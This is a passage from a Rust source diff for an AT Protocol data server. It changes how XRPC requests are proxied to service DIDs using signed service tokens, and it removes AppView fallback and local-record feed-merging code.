let key_row = match sqlx::query!(
|
||||
"SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
|
||||
auth_user.did
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(row)) => row,
|
||||
Ok(None) => {
|
||||
error!(did = %auth_user.did, "No signing key found for user");
|
||||
return ApiError::InternalError.into_response();
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Database error fetching signing key");
|
||||
return ApiError::DatabaseError.into_response();
|
||||
}
|
||||
};
|
||||
let decrypted_key =
|
||||
match crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) {
|
||||
Ok(k) => k,
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Failed to decrypt signing key");
|
||||
return ApiError::InternalError.into_response();
|
||||
}
|
||||
};
|
||||
let service_token = match crate::auth::create_service_token(
|
||||
&auth_user.did,
|
||||
&input.service_did,
|
||||
"app.bsky.notification.registerPush",
|
||||
&decrypted_key,
|
||||
) {
|
||||
Ok(t) => t,
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Failed to create service token");
|
||||
return ApiError::InternalError.into_response();
|
||||
}
|
||||
};
|
||||
let target_url = format!("{}/xrpc/app.bsky.notification.registerPush", resolved.url);
|
||||
info!(
|
||||
target = %target_url,
|
||||
service_did = %input.service_did,
|
||||
platform = %input.platform,
|
||||
"Proxying registerPush request"
|
||||
);
|
||||
let client = proxy_client();
|
||||
let request_body = json!({
|
||||
"serviceDid": input.service_did,
|
||||
"token": input.token,
|
||||
"platform": input.platform,
|
||||
"appId": input.app_id
|
||||
});
|
||||
match client
|
||||
.post(&target_url)
|
||||
.header("Authorization", format!("Bearer {}", service_token))
|
||||
.header("Content-Type", "application/json")
|
||||
.json(&request_body)
|
||||
.send()
|
||||
.await
|
||||
{
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
if status.is_success() {
|
||||
StatusCode::OK.into_response()
|
||||
} else {
|
||||
let body = resp.bytes().await.unwrap_or_default();
|
||||
error!(
|
||||
status = %status,
|
||||
"registerPush upstream error"
|
||||
);
|
||||
ApiError::from_upstream_response(status.as_u16(), &body).into_response()
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Error proxying registerPush");
|
||||
if e.is_timeout() {
|
||||
ApiError::UpstreamTimeout.into_response()
|
||||
} else if e.is_connect() {
|
||||
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
|
||||
.into_response()
|
||||
} else {
|
||||
ApiError::UpstreamFailure.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
100
src/api/proxy.rs
100
src/api/proxy.rs
@@ -1,11 +1,13 @@
|
||||
use crate::api::proxy_client::proxy_client;
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
body::Bytes,
|
||||
extract::{Path, RawQuery, State},
|
||||
http::{HeaderMap, Method, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde_json::json;
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
pub async fn proxy_handler(
|
||||
@@ -16,65 +18,80 @@ pub async fn proxy_handler(
|
||||
RawQuery(query): RawQuery,
|
||||
body: Bytes,
|
||||
) -> Response {
|
||||
let proxy_header = headers
|
||||
let proxy_header = match headers
|
||||
.get("atproto-proxy")
|
||||
.and_then(|h| h.to_str().ok())
|
||||
.map(|s| s.to_string());
|
||||
let (appview_url, service_aud) = match &proxy_header {
|
||||
Some(did_str) => {
|
||||
let did_without_fragment = did_str.split('#').next().unwrap_or(did_str).to_string();
|
||||
match state.appview_registry.resolve_appview_did(&did_without_fragment).await {
|
||||
Some(resolved) => (resolved.url, Some(resolved.did)),
|
||||
None => {
|
||||
error!(did = %did_str, "Could not resolve service DID");
|
||||
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID")
|
||||
.into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
{
|
||||
Some(h) => h.to_string(),
|
||||
None => {
|
||||
match state.appview_registry.get_appview_for_method(&method).await {
|
||||
Some(resolved) => (resolved.url, Some(resolved.did)),
|
||||
None => {
|
||||
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured for this method")
|
||||
.into_response();
|
||||
}
|
||||
}
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({
|
||||
"error": "InvalidRequest",
|
||||
"message": "Missing required atproto-proxy header"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let did = proxy_header.split('#').next().unwrap_or(&proxy_header);
|
||||
let resolved = match state.did_resolver.resolve_did(did).await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
error!(did = %did, "Could not resolve service DID");
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({
|
||||
"error": "UpstreamFailure",
|
||||
"message": "Could not resolve service DID"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let target_url = match &query {
|
||||
Some(q) => format!("{}/xrpc/{}?{}", appview_url, method, q),
|
||||
None => format!("{}/xrpc/{}", appview_url, method),
|
||||
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
|
||||
None => format!("{}/xrpc/{}", resolved.url, method),
|
||||
};
|
||||
info!("Proxying {} request to {}", method_verb, target_url);
|
||||
|
||||
let client = proxy_client();
|
||||
let mut request_builder = client.request(method_verb, &target_url);
|
||||
|
||||
let mut auth_header_val = headers.get("Authorization").cloned();
|
||||
if let Some(aud) = &service_aud {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
) {
|
||||
match crate::auth::validate_bearer_token(&state.db, &token).await {
|
||||
Ok(auth_user) => {
|
||||
if let Some(key_bytes) = auth_user.key_bytes {
|
||||
match crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) {
|
||||
Ok(new_token) => {
|
||||
if let Ok(val) = axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) {
|
||||
auth_header_val = Some(val);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
warn!("Failed to create service token: {:?}", e);
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
) {
|
||||
match crate::auth::validate_bearer_token(&state.db, &token).await {
|
||||
Ok(auth_user) => {
|
||||
if let Some(key_bytes) = auth_user.key_bytes {
|
||||
match crate::auth::create_service_token(
|
||||
&auth_user.did,
|
||||
&resolved.did,
|
||||
&method,
|
||||
&key_bytes,
|
||||
) {
|
||||
Ok(new_token) => {
|
||||
if let Ok(val) =
|
||||
axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token))
|
||||
{
|
||||
auth_header_val = Some(val);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
warn!("Failed to create service token: {:?}", e);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
warn!("Token validation failed: {:?}", e);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
warn!("Token validation failed: {:?}", e);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(val) = auth_header_val {
|
||||
request_builder = request_builder.header("Authorization", val);
|
||||
}
|
||||
@@ -86,6 +103,7 @@ pub async fn proxy_handler(
|
||||
if !body.is_empty() {
|
||||
request_builder = request_builder.body(body);
|
||||
}
|
||||
|
||||
match request_builder.send().await {
|
||||
Ok(resp) => {
|
||||
let status = resp.status();
|
||||
|
||||
@@ -1,456 +0,0 @@
|
||||
use crate::api::ApiError;
|
||||
use crate::api::proxy_client::{
|
||||
MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
http::{HeaderMap, HeaderValue, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use bytes::Bytes;
|
||||
use chrono::{DateTime, Utc};
|
||||
use cid::Cid;
|
||||
use jacquard_repo::storage::BlockStore;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::Value;
|
||||
use std::collections::HashMap;
|
||||
use tracing::{error, info, warn};
|
||||
use uuid::Uuid;
|
||||
|
||||
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
|
||||
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct PostRecord {
|
||||
#[serde(rename = "$type")]
|
||||
pub record_type: Option<String>,
|
||||
pub text: String,
|
||||
pub created_at: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub reply: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub embed: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub langs: Option<Vec<String>>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub labels: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub tags: Option<Vec<String>>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct ProfileRecord {
|
||||
#[serde(rename = "$type")]
|
||||
pub record_type: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub display_name: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub description: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub avatar: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub banner: Option<Value>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct RecordDescript<T> {
|
||||
pub uri: String,
|
||||
pub cid: String,
|
||||
pub indexed_at: DateTime<Utc>,
|
||||
pub record: T,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct LikeRecord {
|
||||
#[serde(rename = "$type")]
|
||||
pub record_type: Option<String>,
|
||||
pub subject: LikeSubject,
|
||||
pub created_at: String,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct LikeSubject {
|
||||
pub uri: String,
|
||||
pub cid: String,
|
||||
}
|
||||
|
||||
#[derive(Debug, Default)]
|
||||
pub struct LocalRecords {
|
||||
pub count: usize,
|
||||
pub profile: Option<RecordDescript<ProfileRecord>>,
|
||||
pub posts: Vec<RecordDescript<PostRecord>>,
|
||||
pub likes: Vec<RecordDescript<LikeRecord>>,
|
||||
}
|
||||
|
||||
pub async fn get_records_since_rev(
|
||||
state: &AppState,
|
||||
did: &str,
|
||||
rev: &str,
|
||||
) -> Result<LocalRecords, String> {
|
||||
let mut result = LocalRecords::default();
|
||||
let user_id: Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.map_err(|e| format!("DB error: {}", e))?
|
||||
.ok_or_else(|| "User not found".to_string())?;
|
||||
let rows = sqlx::query!(
|
||||
r#"
|
||||
SELECT record_cid, collection, rkey, created_at, repo_rev
|
||||
FROM records
|
||||
WHERE repo_id = $1 AND repo_rev > $2
|
||||
ORDER BY repo_rev ASC
|
||||
LIMIT 10
|
||||
"#,
|
||||
user_id,
|
||||
rev
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await
|
||||
.map_err(|e| format!("DB error fetching records: {}", e))?;
|
||||
if rows.is_empty() {
|
||||
return Ok(result);
|
||||
}
|
||||
let sanity_check = sqlx::query_scalar!(
|
||||
"SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
|
||||
user_id,
|
||||
rev
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.map_err(|e| format!("DB error sanity check: {}", e))?;
|
||||
if sanity_check.is_none() {
|
||||
warn!("Sanity check failed: no records found before rev {}", rev);
|
||||
return Ok(result);
|
||||
}
|
||||
struct RowData {
|
||||
cid_str: String,
|
||||
collection: String,
|
||||
rkey: String,
|
||||
created_at: DateTime<Utc>,
|
||||
}
|
||||
let mut row_data: Vec<RowData> = Vec::with_capacity(rows.len());
|
||||
let mut cids: Vec<Cid> = Vec::with_capacity(rows.len());
|
||||
for row in &rows {
|
||||
if let Ok(cid) = row.record_cid.parse::<Cid>() {
|
||||
cids.push(cid);
|
||||
row_data.push(RowData {
|
||||
cid_str: row.record_cid.clone(),
|
||||
collection: row.collection.clone(),
|
||||
rkey: row.rkey.clone(),
|
||||
created_at: row.created_at,
|
||||
});
|
||||
}
|
||||
}
|
||||
let blocks: Vec<Option<Bytes>> = state
|
||||
.block_store
|
||||
.get_many(&cids)
|
||||
.await
|
||||
.map_err(|e| format!("Error fetching blocks: {}", e))?;
|
||||
for (data, block_opt) in row_data.into_iter().zip(blocks.into_iter()) {
|
||||
let block_bytes = match block_opt {
|
||||
Some(b) => b,
|
||||
None => continue,
|
||||
};
|
||||
result.count += 1;
|
||||
let uri = format!("at://{}/{}/{}", did, data.collection, data.rkey);
|
||||
if data.collection == "app.bsky.actor.profile" && data.rkey == "self" {
|
||||
if let Ok(record) = serde_ipld_dagcbor::from_slice::<ProfileRecord>(&block_bytes) {
|
||||
result.profile = Some(RecordDescript {
|
||||
uri,
|
||||
cid: data.cid_str,
|
||||
indexed_at: data.created_at,
|
||||
record,
|
||||
});
|
||||
}
|
||||
} else if data.collection == "app.bsky.feed.post" {
|
||||
if let Ok(record) = serde_ipld_dagcbor::from_slice::<PostRecord>(&block_bytes) {
|
||||
result.posts.push(RecordDescript {
|
||||
uri,
|
||||
cid: data.cid_str,
|
||||
indexed_at: data.created_at,
|
||||
record,
|
||||
});
|
||||
}
|
||||
} else if data.collection == "app.bsky.feed.like"
|
||||
&& let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
|
||||
result.likes.push(RecordDescript {
|
||||
uri,
|
||||
cid: data.cid_str,
|
||||
indexed_at: data.created_at,
|
||||
record,
|
||||
});
|
||||
}
|
||||
}
|
||||
Ok(result)
|
||||
}
|
||||
|
||||
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
|
||||
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
|
||||
for post in &local.posts {
|
||||
match oldest {
|
||||
None => oldest = Some(post.indexed_at),
|
||||
Some(o) if post.indexed_at < o => oldest = Some(post.indexed_at),
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
for like in &local.likes {
|
||||
match oldest {
|
||||
None => oldest = Some(like.indexed_at),
|
||||
Some(o) if like.indexed_at < o => oldest = Some(like.indexed_at),
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
oldest.map(|o| (Utc::now() - o).num_milliseconds())
|
||||
}
|
||||
|
||||
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
|
||||
headers
|
||||
.get(REPO_REV_HEADER)
|
||||
.and_then(|h| h.to_str().ok())
|
||||
.map(|s| s.to_string())
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct ProxyResponse {
|
||||
pub status: StatusCode,
|
||||
pub headers: HeaderMap,
|
||||
pub body: bytes::Bytes,
|
||||
}
|
||||
|
||||
impl ProxyResponse {
|
||||
pub fn into_response(self) -> Response {
|
||||
let mut response = Response::builder().status(self.status);
|
||||
for (key, value) in self.headers.iter() {
|
||||
response = response.header(key, value);
|
||||
}
|
||||
response.body(axum::body::Body::from(self.body)).unwrap()
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn proxy_to_appview_via_registry(
|
||||
state: &AppState,
|
||||
method: &str,
|
||||
params: &HashMap<String, String>,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
) -> Result<ProxyResponse, Response> {
|
||||
let resolved = state.appview_registry.get_appview_for_method(method).await.ok_or_else(|| {
|
||||
ApiError::UpstreamUnavailable(format!("No AppView configured for method: {}", method)).into_response()
|
||||
})?;
|
||||
proxy_to_appview_with_url(method, params, auth_did, auth_key_bytes, &resolved.url, &resolved.did).await
|
||||
}
|
||||
|
||||
pub async fn proxy_to_appview_with_url(
|
||||
method: &str,
|
||||
params: &HashMap<String, String>,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
appview_url: &str,
|
||||
appview_did: &str,
|
||||
) -> Result<ProxyResponse, Response> {
|
||||
if let Err(e) = is_ssrf_safe(appview_url) {
|
||||
error!("SSRF check failed for appview URL: {}", e);
|
||||
return Err(
|
||||
ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(),
|
||||
);
|
||||
}
|
||||
let target_url = format!("{}/xrpc/{}", appview_url, method);
|
||||
info!(target = %target_url, "Proxying request to appview");
|
||||
let client = proxy_client();
|
||||
let mut request_builder = client.get(&target_url).query(params);
|
||||
if let Some(key_bytes) = auth_key_bytes {
|
||||
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
|
||||
Ok(service_token) => {
|
||||
request_builder =
|
||||
request_builder.header("Authorization", format!("Bearer {}", service_token));
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Failed to create service token");
|
||||
return Err(ApiError::InternalError.into_response());
|
||||
}
|
||||
}
|
||||
}
|
||||
match request_builder.send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
let headers: HeaderMap = resp
|
||||
.headers()
|
||||
.iter()
|
||||
.filter(|(k, _)| {
|
||||
RESPONSE_HEADERS_TO_FORWARD
|
||||
.iter()
|
||||
.any(|h| k.as_str().eq_ignore_ascii_case(h))
|
||||
})
|
||||
.filter_map(|(k, v)| {
|
||||
let name = axum::http::HeaderName::try_from(k.as_str()).ok()?;
|
||||
let value = HeaderValue::from_bytes(v.as_bytes()).ok()?;
|
||||
Some((name, value))
|
||||
})
|
||||
.collect();
|
||||
let content_length = resp.content_length().unwrap_or(0);
|
||||
if content_length > MAX_RESPONSE_SIZE {
|
||||
error!(
|
||||
content_length,
|
||||
max = MAX_RESPONSE_SIZE,
|
||||
"Upstream response too large"
|
||||
);
|
||||
return Err(ApiError::UpstreamFailure.into_response());
|
||||
}
|
||||
let body = resp.bytes().await.map_err(|e| {
|
||||
error!(error = ?e, "Error reading proxy response body");
|
||||
ApiError::UpstreamFailure.into_response()
|
||||
})?;
|
||||
if body.len() as u64 > MAX_RESPONSE_SIZE {
|
||||
error!(
|
||||
len = body.len(),
|
||||
max = MAX_RESPONSE_SIZE,
|
||||
"Upstream response body exceeded size limit"
|
||||
);
|
||||
return Err(ApiError::UpstreamFailure.into_response());
|
||||
}
|
||||
Ok(ProxyResponse {
|
||||
status,
|
||||
headers,
|
||||
body,
|
||||
})
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Error sending proxy request");
|
||||
if e.is_timeout() {
|
||||
Err(ApiError::UpstreamTimeout.into_response())
|
||||
} else if e.is_connect() {
|
||||
Err(
|
||||
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
|
||||
.into_response(),
|
||||
)
|
||||
} else {
|
||||
Err(ApiError::UpstreamFailure.into_response())
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
|
||||
let mut response = (StatusCode::OK, Json(data)).into_response();
|
||||
if let Some(lag_ms) = lag
|
||||
&& let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
|
||||
response
|
||||
.headers_mut()
|
||||
.insert(UPSTREAM_LAG_HEADER, header_val);
|
||||
}
|
||||
response
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct AuthorView {
|
||||
pub did: String,
|
||||
pub handle: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub display_name: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub avatar: Option<String>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct PostView {
|
||||
pub uri: String,
|
||||
pub cid: String,
|
||||
pub author: AuthorView,
|
||||
pub record: Value,
|
||||
pub indexed_at: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub embed: Option<Value>,
|
||||
#[serde(default)]
|
||||
pub reply_count: i64,
|
||||
#[serde(default)]
|
||||
pub repost_count: i64,
|
||||
#[serde(default)]
|
||||
pub like_count: i64,
|
||||
#[serde(default)]
|
||||
pub quote_count: i64,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct FeedViewPost {
|
||||
pub post: PostView,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub reply: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub reason: Option<Value>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub feed_context: Option<String>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct FeedOutput {
|
||||
pub feed: Vec<FeedViewPost>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub cursor: Option<String>,
|
||||
}
|
||||
|
||||
pub fn format_local_post(
|
||||
descript: &RecordDescript<PostRecord>,
|
||||
author_did: &str,
|
||||
author_handle: &str,
|
||||
profile: Option<&RecordDescript<ProfileRecord>>,
|
||||
) -> PostView {
|
||||
let display_name = profile.and_then(|p| p.record.display_name.clone());
|
||||
PostView {
|
||||
uri: descript.uri.clone(),
|
||||
cid: descript.cid.clone(),
|
||||
author: AuthorView {
|
||||
did: author_did.to_string(),
|
||||
handle: author_handle.to_string(),
|
||||
display_name,
|
||||
avatar: None,
|
||||
extra: HashMap::new(),
|
||||
},
|
||||
record: serde_json::to_value(&descript.record).unwrap_or(Value::Null),
|
||||
indexed_at: descript.indexed_at.to_rfc3339(),
|
||||
embed: descript.record.embed.clone(),
|
||||
reply_count: 0,
|
||||
repost_count: 0,
|
||||
like_count: 0,
|
||||
quote_count: 0,
|
||||
extra: HashMap::new(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
|
||||
if posts.is_empty() {
|
||||
return;
|
||||
}
|
||||
let new_items: Vec<FeedViewPost> = posts
|
||||
.into_iter()
|
||||
.map(|post| FeedViewPost {
|
||||
post,
|
||||
reply: None,
|
||||
reason: None,
|
||||
feed_context: None,
|
||||
extra: HashMap::new(),
|
||||
})
|
||||
.collect();
|
||||
feed.extend(new_items);
|
||||
feed.sort_by(|a, b| b.post.indexed_at.cmp(&a.post.indexed_at));
|
||||
}
|
||||
@@ -1,75 +1,21 @@
|
||||
use crate::api::proxy_client::proxy_client;
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, RawQuery, State},
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Deserialize;
|
||||
use serde_json::json;
|
||||
use tracing::{error, info};
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct DescribeRepoInput {
|
||||
pub repo: String,
|
||||
}
|
||||
|
||||
async fn proxy_describe_repo_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
|
||||
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.describeRepo").await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let target_url = match raw_query {
|
||||
Some(q) => format!("{}/xrpc/com.atproto.repo.describeRepo?{}", resolved.url, q),
|
||||
None => format!("{}/xrpc/com.atproto.repo.describeRepo", resolved.url),
|
||||
};
|
||||
info!("Proxying describeRepo to AppView: {}", target_url);
|
||||
let client = proxy_client();
|
||||
match client.get(&target_url).send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
let content_type = resp
|
||||
.headers()
|
||||
.get("content-type")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
.map(|s| s.to_string());
|
||||
match resp.bytes().await {
|
||||
Ok(body) => {
|
||||
let mut builder = Response::builder().status(status);
|
||||
if let Some(ct) = content_type {
|
||||
builder = builder.header("content-type", ct);
|
||||
}
|
||||
builder
|
||||
.body(axum::body::Body::from(body))
|
||||
.unwrap_or_else(|_| {
|
||||
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
|
||||
})
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error reading AppView response: {:?}", e);
|
||||
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error proxying to AppView: {:?}", e);
|
||||
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn describe_repo(
|
||||
State(state): State<AppState>,
|
||||
Query(input): Query<DescribeRepoInput>,
|
||||
RawQuery(raw_query): RawQuery,
|
||||
) -> Response {
|
||||
let user_row = if input.repo.starts_with("did:") {
|
||||
sqlx::query!(
|
||||
@@ -90,8 +36,19 @@ pub async fn describe_repo(
|
||||
};
|
||||
let (user_id, handle, did) = match user_row {
|
||||
Ok(Some((id, handle, did))) => (id, handle, did),
|
||||
_ => {
|
||||
return proxy_describe_repo_to_appview(&state, raw_query.as_deref()).await;
|
||||
Ok(None) => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let collections_query = sqlx::query!(
|
||||
|
||||
@@ -31,10 +31,11 @@ pub struct DeleteRecordInput {
|
||||
pub async fn delete_record(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
|
||||
Json(input): Json<DeleteRecordInput>,
|
||||
) -> Response {
|
||||
let (did, user_id, current_root_cid) =
|
||||
match prepare_repo_write(&state, &headers, &input.repo).await {
|
||||
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
|
||||
Ok(res) => res,
|
||||
Err(err_res) => return err_res,
|
||||
};
|
||||
|
||||
@@ -1,8 +1,7 @@
|
||||
use crate::api::proxy_client::proxy_client;
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, RawQuery, State},
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
@@ -12,7 +11,7 @@ use serde::{Deserialize, Serialize};
|
||||
use serde_json::json;
|
||||
use std::collections::HashMap;
|
||||
use std::str::FromStr;
|
||||
use tracing::{error, info};
|
||||
use tracing::error;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetRecordInput {
|
||||
@@ -22,69 +21,9 @@ pub struct GetRecordInput {
|
||||
pub cid: Option<String>,
|
||||
}
|
||||
|
||||
async fn proxy_get_record_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
|
||||
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.getRecord").await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let target_url = match raw_query {
|
||||
Some(q) => format!("{}/xrpc/com.atproto.repo.getRecord?{}", resolved.url, q),
|
||||
None => format!("{}/xrpc/com.atproto.repo.getRecord", resolved.url),
|
||||
};
|
||||
info!("Proxying getRecord to AppView: {}", target_url);
|
||||
let client = proxy_client();
|
||||
match client.get(&target_url).send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
let content_type = resp
|
||||
.headers()
|
||||
.get("content-type")
|
